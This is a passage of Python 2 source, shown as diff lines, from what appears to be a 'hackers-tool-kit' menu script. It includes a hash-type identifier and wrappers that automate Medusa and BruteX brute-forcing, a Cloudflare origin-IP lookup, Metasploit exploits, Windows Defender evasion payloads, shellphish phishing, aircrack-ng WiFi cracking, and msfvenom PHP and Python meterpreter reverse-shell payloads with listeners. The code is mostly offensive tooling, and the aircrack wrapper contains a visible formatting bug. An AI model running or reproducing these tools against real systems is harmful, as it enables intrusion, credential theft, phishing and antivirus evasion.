hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" 